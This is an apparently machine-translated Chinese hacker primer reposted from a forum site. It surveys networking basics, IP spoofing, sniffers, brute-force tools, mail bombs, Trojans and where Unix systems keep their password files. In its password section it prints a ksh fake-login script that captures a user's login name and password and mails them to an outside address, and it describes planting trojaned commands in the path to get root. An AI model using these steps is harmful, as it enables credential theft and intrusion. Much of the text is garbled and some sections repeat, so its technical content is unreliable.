For example, 159.226.xxx.xxx is a class B address. 159.226.21. The scope of XXX address is the Automation of Chinese Academy of Sciences, 159.226.40.xxx is China Computing Center, 159.226.41.xxx is a national intelligent center. It can be seen that one of the third byte of this Class B address becomes a sub-network number, and the last byte is used to represent different hosts. Of course, this is just an example. Some units may also conduct a near-step division, and the highest number of third bytes and the fourth byte is also a sub-network number, so there can be only 64 hosts in each subnet. As for how to observe your subnet, Win9X users can run Winipcfg. ● How to know online mask

When there is two machines in the Internet, two host IP addresses are needed to determine if the two mains are in the same subnet. If so, then the packet can be sent directly to the host. If not, then you have to turn to the host where the gateway is located. This can be solved by setting the correct network mask. The network mask is a string corresponding to the network number and the sub-network number 1, the host number portion is 0. You can take a look at your own network number, network mask, etc. You can come from this example: $ ifconfig -a loo: flags = 849 [Up, loopback, running, multicast] MTU 8232 inet 127.0.0.1 Netmask Ffooooo Leo: Flags-863 [Up, Broadcast, NOTRAILERS, Running, Multicast ] MTU 1500 INET 159.226.21.7 Ffffffco Broadcast 159.226.21.191 This can be seen, and the Leo is combined with a Class B address, its IP address is 159.226.21.7, the network mask of this B address is ffffffco, also It is the third byte and the highest bit of the fourth byte to make a subnet number. There are some IP addresses that are reserved: ◇ IP address is 0.0.0.0, use it when the host is booted, will not be used. The IP address of the network number is 0 refers to the host in the same network. ◇ Use the correct network number, and the host number portion is all host broadcasts to all hosts on the Internet with the network number. ◇ The host number part is the IP address of all L for broadcast within this network segment. ◇ Send a packet of the address of 127.0.0.1, which is immediately placed in the input queue of the unit, often used to debug network software.

Now what do you know about the network mask? ~ * ~ ● How to understand the ip!

I think you will often encounter or hear something about the attack of the IP address during the Internet, so how do I understand IP is "stolen"? Often sometimes because IP is not enough, or if you are inappropriate to attack other people's things in order to pretend to hide your own role (I think the proportion of the latter is bigger), I will do the use of IP. Best. In fact, it is necessary to pretend to be a host of a host in the same network segment. You can use the Raw Socket to issue an IP package, of course, the condition is that you must have a superuser permission, but this form generally does not receive the response, The reason is that the gateway does not transfer these packets into this network segment. Think about it, it is relatively simple and convenient to pretend to pretend to be a host IP that is self-employed. If you are a Windows user, you can change the IP address and mask, but UNIX is relatively troublesome, you need to program these (if you succeed, you can fake a lot of IP protocols) The packet is largely disturbed the order of the network). The effect brought by the pretending IP is the same IP in both machines. When both parties have a machine, the system will report an IP conflict. Under normal circumstances, who will continue to use this IP first. However, if Windows and UNIX "strive", then Windows will fail, even if it is Windows first boot ... So how do IP pre-instances? In fact, this problem can be found in many sites. Here is inconvenient to make further explanation.

● Overview of IP spoofing attacks!

An intruder generally creates a packet with a spoofing source IP address in order to access the remote machine. This method they use is to utilize the characteristics of the IP address-based authentication application and may result in access to unauthorized access, and even root access to the target machine system. This kind of attack method can first succeed even if the return package cannot reach the intruder. Of course, it can be done in any case, mainly whether it is the configuration of the target machine. For example: a, supporting a plurality of internal interfaces to external networks; b, in the internal network supports subnets and routers for two network interfaces; C, which uses the source IP address authentication system for FireWall. These three points illustrate the configuration of this method attack. If you have a Telnet in order to facilitate the Internet users, then some services are the same, have a good side, and there is also a unsafe side. IP spoofing attacks in A, SunRPC & NFS; B, X Windows; C, BSD UNIX "R", are more susceptible to attack. As for how to check if there is such IP spoofing, there are many ways, here is the case: the viewer can compare the process account logs between different systems in the internal network. Once the system is attacked, it can be on the attack system. Get a log entry, display the corresponding remote access. In the source machine, there will be no corresponding initialization record items (Note: General intruders know how to modify this log entry). The best way to solve the IP spoof is to install the filter router, which does not allow packets containing internal network addresses to pass the router. In addition, the packets of the source address and the internal network address should be filtered in the packet, which can prevent the IP spoofing attack of the source internal network. Of course, nothing is universal, it is not entirely dependent on this.

● Other protocols of the IP layer! Whether you like a network or pay attention to network security, you will be indispensable to find out that other protocols of the IP layer will be indispensable.

ICMP (Internet Control Message Protocol) is used to transmit some control information about the network and host, such as the target host is not arriving, the relief of the route, whether the target host is used. Common "ping" commands use ICMP protocols. The Echo Request is ping to the target host, and the Echo reply is the target host with the received host. Many cyber attack tools are implemented using this protocol. ARP (Address Resolution Protocol, for address resolution protocol) is used to map the IP address into a corresponding host MAC address. When both host communication in the local area network, you usually need to know the physical address of the target host. The execution of the command ARP can see some correspondence between IP addresses and physical addresses.

RARP (Reverse Address Resolution Protocol, the reverse address resolution protocol) is used to map the physical address to a 32-bit IP address. Most of this agreement is used for start-upless workstations, because the free workstation only knows its own physical address, but also needs to use the RARP protocol to get an IP address.

● Telnet (Remote Login) Telnet is an Internet remote terminal access standard. It trufully imitates the remote terminal, but does not have a graphic role, just access to the character interface. Telnet allows remote access to legitimate users on any site, and does not need to be a special agreement. Telnet is not a secure service. Due to the time of Telnet sends information, it is easy to listen by the network. Telnet is relatively secure only when the remote machine and its network communication between the local site. This illustrates that telnet service in the Internet is unsafe. There is now a safe landing customer program, but this program is not much, mainly because applied this program to have a corresponding server program in the server side. In addition to the Telnet, there are also centralized programs such as rlogin, RSH, ON, can also be used for remote terminal access and executing programs. Use these programs in the envelopes that allow users to remotely log in without having to re-enter the password. That is to say, the remote host believes that the host used by the login is certified by the user name and password. But using these R commands is extremely unsafe, it is easy to be attacked by IP spoofing and name spoofing and other fraud. In general, such managed mode is not suitable for use on the Internet. In fact, because the address trust is very unsafe, don't believe you say which host's packets. Use rlogin and RSH in the network with firewall protection, which is to see security measures within the network. However, ON relies on the customer's host program security check, everyone can avoid checking the client, so ON is not safe, even in the LAN with FireWall protection (it can make any other user Famous to run any parameters). Many hosts have abolished the REXD server and invalid ON.

● Anonymous FTP service uses anonymous FTP, users can log in anonymously to the FTP server. When logging in, users need to provide a complete E-mail address as passwd. In fact, this requirement is equivalent to the same virtual in many sites. You only need to contain @ bytes look like an E-mail address, the host will not make a password. Any papers. When the host of the remote FTP service is handling an anonymous user, a chroot command generally executes anonymous to enable anonymous to enter the anonymous FTP area allowed by the host. However, in order to support anonymous FTP and User FTP, the FTP server is to access all files, which proves that the FTP server is not always running in the Chroot environment. This link will make some stupid deserves not know that they have not been ignored, and it is easy to get the permissions that an anonymous FTP user can be used by hackers. Generally solving this problem can replace the FTP server directly by modifying the INETD, which executes Chroot (similar to the Chrootuid program), and then start the server. In general, FTP is limited to access to anonymous user, anonymous user has its normal permissions, and performing Chroot before starting the server means an anonymous user will be restricted. (Note: Many FTP servers do only in its anonymous FTP system, which is simply referred to in the sales manual of the FTP server, and often do not speak to vulnerabilities and blocked vulnerabilities in these sales instructions. Big intended is absolutely fatal). If an anonymous user gets a file that is not an anonymous user in an anonymous area of the FTP server, then the internal customer may be placed in anonymous FTP area. In many cyber attacks, you can read the passwd password file in many cyber attacks. This is the manifestation of the administrator. ● Network member information Query You can query member information Finger service: Finger service can query personal information of users with accounts on the target host, whether or not this user is currently inquiry. These information like Finger Generally queries include login names, when is the situation where the most local landing is available, and the user's profile. When using the finger command, there are three ways: * Finger @ host command, which will list information about each user logging in in the target host; * Finger user @ host command will list the user's information on the host . * Finger str @ host command does not know the username, providing user names or real names of any user including the specified string STR. In fact, in many times, Finger will provide a lot of useful information to hackers, such as username and user information, often play a lot of help to hackers to run the dictionary. Nowadays, Most hosts have canceled this service, just have the internal network, which prevents the finger request or only gives a little information. It is important to pay special attention to the version of the finger program version now is GNU Finger V1.37, then this program will allow the finger command to request any files on the system, including ... another host information query WHOIS Services: The WHOIS service is similar to the finger, but the information obtained by WHOIS is the host, network, field, and their administrators. In the default, the Whois client is queried by the network information center RS.ISTERNIC.NET in the Internet, including the Internet domain and administrator information. Some sites use the Whois protocol to write server programs to publish user information, just reduce more information according to the host's own situation, but it is often important to hackers.

● Name Service In the Internet, when converting between the host name used to the machine used, this is the name service. In the Internet earlier, each site on the network keeps a list of host lists, where there is a related name of each machine and its IP address. Later, as the host increases, it seems not realistic, it is difficult to do this, it is difficult to do this, because this list will likely be more imagined, and then it is when other machines change the name and corresponding At the time of the address, the list of hosts will not be able to make timely modifications. In view of this, the Internet has a domain name service DNS to replace it. DNS allows each site to keep your own host information, or you can query information about other sites. DNS is essentially a user-level service, but it is the foundation of FTP, SMTP, and Telnet, and each other services may be used. I think many people are willing to use the name instead of another IP address. Moreover, many dual exchanges that use an anonymous FTP servers to name and address, otherwise you will not be allowed to log in from your machine to the FTP server. Generally, one enterprise network must use and provide name service, so that it can be convenient to the Internet. But providing DNS services may leak information on the internal machine of the enterprise network. In DNS's database files, there is often a record of host information. If it is not easy to protect it, it is easy to get the outside world, it is also easy to provide hackers to some of the useful information that can attack (using information such as operating systems used by machines). ). Internal use of DNS and relying on host names, the host will not resist the invasion of establishing a camouflage DNS server. At the same time, the facts also verify that the safer service to be authenticated to automatically prevent name spoofing technology and to authenticate the username and not the hostname measure IP address is not reliable to prevent IP spoofing technology is not fully safe. ● Time Services NTP Network Time Protocol is a service in the Internet, which can set the time setting in the host system very accurate. In many cases, it is important to use the time synchronization between different machines (now the authentication technology in most DCE is dependent on time synchronization). There is a kind of playback intrusion technology to record the next interaction, then run again, if the synchronization clock can be prevented from invading (time sign in the record).

● The level of protocol TCP and UDP is the transport layer corresponding to the OSI reference model. Two protocols are defined at this layer: one is the TCP protocol (ie the transmission control protocol, a reliable,-oriented protocol), which allows the non-error transmission between the two mains information on the Internet. It will receive a long byte stream. Transfer to the network layer sequentially. At the target host, the TCP reception process will reload the received information in the form of the source host TCP layer, and give it to the application layer. The TCP also performs flow control to avoid excessive transmission, so that the slower host is not congested because too much secretary reaches. However, this seminar is entirely transparent, and ordinary users don't know if they don't need to pay attention to these underlying TCP / IP protocols. In network transmission, "Connect" concept is used in order to ensure the correct ordered order transmitted in the network. A TCP connection refers to transmitting three signals before transmitting data so that both parties are prepared for data. The two mainsmen start transmitting data after three handshake signals. Each packet sent by the transmitted number of its number recipient's host sends a message that has been received to the transmitted host each after receiving a packet. If the message sent is wrong or lost on the channel, the transmitted host will be re-issued. When the end is sent, the two hosts will release this connection together. There is no connection to the connection. When you have data, you can have data when you have data. Regardless of the data sent by the transmitted target, it is not wrong, and the target receiver does not tell whether the host is correct, so such data transfer is unreliable. There are two advantages and disadvantages of two. The connection-oriented manner is reliable, but many information-independent information is transmitted in the process of communication, thereby greatly reducing the utilization of the channel, so that the connection is often used for some applications that require a relatively high reliability of data. There is no connection at the time that it is not reliable, but it does not transmit some information that is not related to the data itself, so the speed is high. It is often used in some real-time services, or it can be used for applications that are insensitive to errors, such as sound, images, and the like. ● NET environment file, can be used to control NetBIOS network resources, it can provide almost all NetBIOS network features, I can only write its subcommands, you can try it: Accounts, Computer, Print , Send, Name, Use, User, View, Pause, Localgroup, Share, Config, File, Continue, Group, Help, Stop, Start, Time, Session, Statistics ........ ● NetStat environment file, used to display current TCP / IP connection and status. Can you enter /? The command of the parameter can see some command characters about it. If you want to listen continuously, you can use intervals to set up regularly, automatic refresh display (for example: netstat -a 5) will display all TCP / IP connectivity in 5 seconds, including servers The port of the listener wants to stop it is pressing the CTRL BREAK button. . . . . .

● ping (bullets .. huhha) environment file, can be used to send ICMP to send packets to remote systems to determine that the system can be further used for TCP / IP services (or you can see the result after you blew, ~ - ~ ~). With the PING detection host, it still works, it is in TCP / IP, and the verb "DID You Ping the Server?" Is used. You can see the described commands in the input parameter that does not command. Simple ping can determine the work of abnormal objects, but if you want to execute the ping command for a remote machine, you can do the same physical layer, data link layer, and all functions of the network layer correct, communication problems are generally more High-rise. A hacker can use the PING terms to infringe the network, such as using ping by sending a large number of ping (bullets) packets, causing submerged invalid data. One machine does not play a role, but there are multiple machines to send this command at the same time, then ..., this is also an attack of the service, which can cause the remote system TCP / IP server crash. NT is the most sensitive to this attack ... ● Telnet (remote login) I will not say much. But you want to prompt is a lot of routers, switches, firewalls, can be configured by it to their IP address, of course, can also be configured by hackers, hackers can be connected to IP via Telnet ports. You can also block the internal Telnet connection through the firewall ...

● Tracert can be used to display routers between two Internet communication hosts. Since most servers use meaningful names in its router interface, it is usually possible to infer the relevant situation of two hosts. . . . . .

● Netalert This is a time, but it is often used, but I still feel very useful. It can be used to monitor the status of the target TCP / IP service. It monitors through cycle intervention. When the status of the port is turned or closed, it will send you an email information to inform you. But it needs the mail program Blat1.2 or more to take the email function. . . . .

● NAT (NetBIOS Auditing Tool) From the physical sense of this is a NetBIOS security trial or monitoring tool, the essential purpose can reveal the security defect in the NetBIOS network, which is more practical, and now there are many tools available to this. One of its features is the automatic password check, for hackers ... huh, huh. Use it you can automatically issue an attack for a NT server (as if you can also do it on Unix), you can use the account password multiple times and try to connect through NetBIOS (you can allow remote machine mapping drives). It can accept the account list and password list, and then attack each account and password according to the order of the appearance ... it accepts three command parameters: -o (Specify the recording file to redirection) -U (specified account) Text files) -p (Specify text files for passwords for each account) But now there are many ways to block NAT attacks, such as renaming the Administrator account and restricting the Administrator account registration network, and so on. . . . .

● Ethernet Sniffer Sniffer is a way to break in today. Although the computer is a shared channel in the network, it generally only accepts the packet of the destination address in the packet with its own network address, without accepting online transmission. Packets sent to other computers. In addition to the broadcast package, the header of these packets is all 0 or 1, so all the computers on the network can read it. But if a machine can accept all information, regardless of this information is sent, this machine can be called Sniffer. It may be the system administrator management in the network, but most of the hacker is used to invade the machine. Since the account and password are transmitted in the text format on the Ethernet, if a hacker has a way to control Sniffer, then all machines on the network are in danger. . ● How to know if he is eavesdropped to eavesdrop, may be a dedicated hardware, or it may be performed by running some eavesdropping software. First, you should carefully check each of the connectivity of the network along the physical wiring of the network. After the possibility of excluding the hardware, the next step is to detect if there is software to hear. When the eavesdropline is running, the port of the eavesdropped computer will be changed to Xuzu mode, in this way, it can eavesdrop all the packets. Run the "ifconfig -a" command under SunOS, NetBSD, and BSD-based UNIX systems, which will tell you all ports of the machine and whether they are in dangerous Xu Wei mode. It is not so convenient in DEC OSF / 1 and IRIX, and you need to specify which port is only line. In this case, you can run NetStat -R to see how many ports have. After finding the port, use #ifconfig le0 to detect ... (Generally experienced intruders will replace "ifconfig" commands to escape detection. At this time you can use some tools, like CPM can be automatically Detecting ports, it runs under the SunOS operating system.) Some eavesdrops run, which will copy a packet transmitted on the network by accessing the packet device, stored on the network host, forming a continuous growth over time. Document, this file is usually large, and this file will be larger on a network that is high in a wide range. There is a tool called LSOF (List Open Files) to find these growing files and can find programs that are accessing the packet device, which in Sunos is / dev / nit.

● Let you know the means of hacker attack password hacker attack targets, usually put the password of different users as an attack. They first use the "Finger Restaurant Host Name" to find the user account on the host, and then attack with the dictionary exhaustion. Its principle is to automatically remove a word from the machine dictionary as a password from the machine dictionary based on the actual situation of users who often adopt the network on the network, and automatically remove a word from the machine dictionary as a user's password to the remote host. . If the password is wrong, then the next word will be looped as sequence until the correct password or dictionary is used until the word is used (this is the form of vomiting blood, I can't, huh, ". The most typical dictionary representative is Letmein Version 2.0, and I like domestic "Wanjo Key" and Xiao Yan's "hack dictionary". If these or more methods are not, hackers will look for weak links and safety of target machines, and wait for the password file passwd or shadow stored in the target. Now the UNIX system, the basic information of the user is stored in the Passwd file, and all passwords are dedicated to the DES encryption method, which is specifically stored in a file called "Shadow" (shadow) and is under strict protection. The old version of UNIX does not have a shadow file, and its password is placed in the Passwd file. If you get a password, hackers will use programs dedicated to crack the DES encryption method to crack the password. ● Method 1 of acquiring password files 1. Run the shell command with KSH in the case of accessing the other party machine. As follows: Clear Stty Ignbrk Echo "Login: / C" Read logname stty -echo echo "Password: / c" read passwd print "/ nlogin incorrect / n" Print $ logname $ passwd | mail cxterm.bbs@jet.ncic.an .cn stty 0 stty echo exit 2, put the procedures such as "LS", "grep" in the directory you can use, I hope that root will run to them (嘿. Although some are like being waiting for the rabbit, but most of you Must this), once root runs, you can get root privileges. So there should be "." The current directory should not be "." In the path. 3, more thorough approach is the plaintext of the secret in the passwind file. First you have to get the other party's Ciphertext, if you need to get / etc / shadow on the machine with shadow "shadow" Passwd. If you get it, you can restore this file into a visual original text. Most of the tools are now foolified, so it is simple in this area.

● E-mail Bomb Electronic mailbox bombbox bomb is also one of the common hackers commonly used attack methods. Mail bomb is simple and fast relative to other means. The so-called mailbox bomb is actually an unknown address, a large amount of malicious email, full of garbled or swreematic words is also spam. Everyone's mail mailbox is limited space, so when this large amount of garbage will cause the mailbox capacity to rush away, the normal mail is taken up, and it takes up a lot of network resources. You can't run the system normally. Now, the network you can get a lot of such email bombs, and have gradually popular trend.嘿嘿. It seems that we have a little ready. (I have never used mail bomb, because I think I think the email bomb is more like a coward.) The most typical representative in the email bomb is Kaboom!, Now the kaboom! V3.0 version is more than I have added a lot of features, it can be uninterrupted, and the list of address lists that are commonly used anonymous mail servers are also done in the program, and users can add new features. Another person can subscribe to someone who attacks some email discussion groups, and there are some very funny sound effects. A small window will appear after starting this program, with 3 buttons, which make Mailbomber (Fryer), Mailing Lists (subscribed to others) and Close, which is easy. But I don't want you to use it because of my article. ● Trojan Horse (Trojan Horse) I think this everyone should be well known. Trojm Horse is a kind of malicious hazardous procedure, and it is the difference between Trojan horses to spread by parasitic or human "planting". The most famous Trojan horse called PKZIP300, the file name may be pkzip300.zip or Exe file, it seems to be the latest version of PKZIP. If you find that the most sensible choice of the program is not to download, because you run it it will remove the hard disk and interfere with the use of the cat. Some people are now different from those of the far-sighted controller and the Trojan. In fact, they don't have a big difference, I am not very detailed here, I hope that everyone knows that the environment running in the remote controller is a need for a wooden horse (usually this Trojan is called S-terminal, that is, Server). And many times these are hacked.

● About PGP is an abbreviation for e-text "pretty good privacy". Its founders are USA's Phil Zimmermann. He combines the safe and convenient security of the RSA public and the traditional encryption system and has a good design in digital signature and key certification management mechanism, so PGP is currently a popular encryption package. PGP is currently running version on various types of operating systems such as MS-DOS, UNIX, VAX / AMS. It is a publicly used encryption software. Everyone knows that the data transmitted on the Internet is not encrypted, so if you don't protect your own information, then you may be used by hackers to get your privacy. . . . . PGP command parameters I have dizzy, because I just hobbied, so I will not take time and managers to study it, but I know that there is a tool called PGPshell to make you simple to generate your own key.

● What is buffer overflow refers to a means of system attacks, and writes over the length of its length by going to the program's buffer, resulting in a buffer overflow, thereby destroying the stack of the program. Enable the program to perform other commands to achieve the purpose of attack. The cause of buffer overflow is that the parameters of the user input is not carefully checked in the program. The most common means is to perform a shell by overflowing a buffer of a particular program, and an advanced command can be performed by the SHELL permissions. If this special procedure belongs to root and has SUID, an attacker gets a shell with root privileges. So how can you make the buffer overflow? In fact, instances of these aspects have a lot of online. You can find it, don't ask me, I don't know. ~ - ~ ● About UNIX System UNIX is some work in 1969 by Ken Thompson, Dennis Ritchie and some people on a PDP-7, which later turned into UNIX. Due to the intervention of AT & T, Berkeley and other organizations, the development of UNIX has grown, and gradually forms two geography, which is the BSD of AT & T System v with Berkeley Software. The SVR4 is the product after two major genres. At the end of 1991, Open Software Foundation launched OSF / 1 tried to compete with System V, but now, OSF / 1 is a bit of powerful power.

● Location of the password file in different UNIX systems

System path symbol unicos / etc / udb *

Ultrix 4 /etc/auth[.dir|.pag] *

System V RELEASE 4.0 / etc / shadow x

System V Release 4.2 / etc / security / * database x

Linux1.1 / etc / shadow *

IRIX5 / ETC / Shadow X

EP / IX / ETC / Shadow X

HP-UX /.Secure/etc/passwd *

DG / UX / ETC / TCB / AA / USER *

ConvexOS 10/11 / etc / shadow *

BSD4.3-reno /etc/master.passwd *

A / UX 3.0S / TCB / files / auth /? / *

Sunos5.0 / etc / shadow

OSF / 1 /etc/passwd[dir|.pag] *

Sunos4.1 c2 /etc/security/passwd.adjunct ## username

AIX 3 / etc / security / passwd! # / Tcb / auth / files /

SCO UNIX # .2.x / tcb / auth / files // *

System path symbol unicos / etc / udb *

Ultrix 4 /etc/auth[.dir|.pag] *

System V RELEASE 4.0 / etc / shadow x

System v release4.2 / etc / security / * database x

Linux1.1 / etc / shadow *

IRIX5 / ETC / Shadow X

EP / IX / ETC / Shadow X

HP-UX /.Secure/etc/passwd *

DG / UX / ETC / TCB / AA / USER *

ConvexOS 10/11 / etc / shadow *

BSD4.3-reno /etc/master.passwd *

A / UX3.0S / TCB / FILES / AUTH /? / *

Sunos5.0 / etc / shadow

OSF / 1 /etc/passwd[dir|.pag] *

Sunos4.1 c2 /etc/security/passwd.adjunct ## username

AIX 3 / etc / security / passwd! # / Tcb / auth / files / sco unix # .2.x / tcb / auth / files // *

● About the basics of scanning tools There are quite safe hazards in all UNIX and Windows and other platforms and networks, and these safety hazards will often lead to attacks or errors, so since it is A tool that can scan these hidden dangers and scan these hidden dangers and modify and fill it. So generate a network scan tool. For hackers, the scanning tool is an absolutely necessary attack tool, as the hacking can not leave the package of the remote machine in security, weakness. The scanning tool allows you to find the system's security risks, but users must also have a lot of relevant system security knowledge, and it is necessary to understand the data of the data scanned. You can also write a scan it yourself. In fact, it is not difficult to scan tools. You only have one of TCP / IP-related knowledge, as well as one or more scripting languages such as C, Shell or Perl (Of course, you have to go to see SOCKET Programming Knowledge can write a self-scan tool yourself. Most of the principles of scanning tools are the same. If you are interested in writing, you can start with a simple port scan program.

● The implementation of NIS system NIS (previously called Yellow Pages Service, YP) is based on remote process RPC protocol, and she uses external data representations. NIS is developed by Sun Microsystem, main functionality is to reduce the workload of the UNIX network system. This is implemented by concentrating on each machine to a NIS server, so if you change the configuration file on the NIS server to complete the configuration of each client. And a network tool, it itself has security issues. It is also a more popular hacker attack method using the method of disguising into NIS servers. Safety hazards that are often NIS can affect UNIX profile / etc / passwd being mapped into passwd.byname and passwd.byuid ... and enable attackers to get root access. Generally utilizing NIS to do an intrusion using the NetWork Interface TAP software module provided by Sun, you can change the external data package source IP address. In order to enable attackers to capture into NIS servers to get permission ...

● About NFS protocols Mount protocols are NFS clients and NFS servers for initialization negotiation, and negotiation content includes: returning a file system to a file system, report the list of file systems installed, clear a customer installation file system Records and the list of file systems that can be installed to customers. The NFS protocol is based on the Mount protocol. A customer can list the directory list of the installed file system through the NFS protocol, get the handle of the file or anger, and can even create, read and write and modify the file. Correctly established NFS includes the correct configuration of customers and servers, NFS will be transparent to the user, in order to use NFS to run BIOD, RPC.Lockd, and rpc.statd process. These processes are typically performed in a script file for a system's terms, or can be manually started ... The NFS of the server is provided by starting the NFSD and RPC.Mount processes and RPC.lock and RPC.statd processes. Also these processes are typically performed in a booted script file of the system. You can also start manually.

● About the port has learned to go online to now, as long as a connection to my ISP will be full of port digital numbers, it is confused ^ * ^. On each host in the Internet, multiple server processes are often running. When communicating with this host, it is not only to indicate the address of the communication host, but also to indicate a service communication channel on this host. And usually use port numbers to identify these different service channels on the host. The port number is a 16-bit number, which can be encapsulated 65535, in practice, port is like a country's border defense card. Its opening and closing often indicates the national reform and opening up and fun (this host has a service), but it has always necessary to show you the certificate of your size, but don't control open this level. It's dangerous. The science said that the port is like this: ... Many daemon programs can be initialized on the Internet. Most of them are the client's procedure. Whenever a connection request arrives, there will be a server process to be started and communicated with the requesting client machine. To facilitate this process, each application is given a unique address, which is called port. Like FTP 21, Telnet is 23, the ice river horse is 7626 ... Each application is connected to a particular port, and when any connection request is reached with the port, the corresponding application is started. (Inetd is such a program that launches other applications). Here and some common ports and corresponding services or applications to attack: File Transfer Protocol (FTP) TCP Port21 Telnet TCP Port23 Simple Mail Transfer Protocol (SMTP) TCP Port25 Gopher TCP Port70 Finger TCP Port79 Hypertext Transfer Protocol (HTTP) TCP Port80 Network News Transfer Protocol (NNTP) TCP Port119 System Time Service (NTP) TCP / UDP Port37 This is said that there are some questions, and now many beginners are very keen on chat room or BBS to crack the password of others, but I don't know Why start. In fact, because the chat room or BBS is in response to a port number, if your crack has targeted, then the crack will become simply. ^ * ^ Nothing to do, you only have one of TCP / IP-related knowledge, as well as one or more scripting languages such as C, Shell or Perl (of course, you have to learn about Socket programming) can write one Your own scan tool. Most of the principles of scanning tools are the same. If you are interested in writing, you can start with a simple port scan program. ● The implementation of NIS system NIS (previously called Yellow Pages Service, YP) is based on remote process RPC protocol, and she uses external data representations. NIS is developed by Sun Microsystem, main functionality is to reduce the workload of the UNIX network system. This is implemented by concentrating on each machine to a NIS server, so if you change the configuration file on the NIS server to complete the configuration of each client. And a network tool, it itself has security issues. It is also a more popular hacker attack method using the method of disguising into NIS servers. Safety hazards that are often NIS can affect UNIX profile / etc / passwd being mapped into passwd.byname and passwd.byuid ... and enable attackers to get root access. Generally utilizing NIS to do an intrusion using the NetWork Interface TAP software module provided by Sun, you can change the external data package source IP address. In order to enable attackers to capture into NIS servers to get permission ...

转载请注明原文地址:https://www.9cbs.com/read-38102.html

9cbs

New Post(0)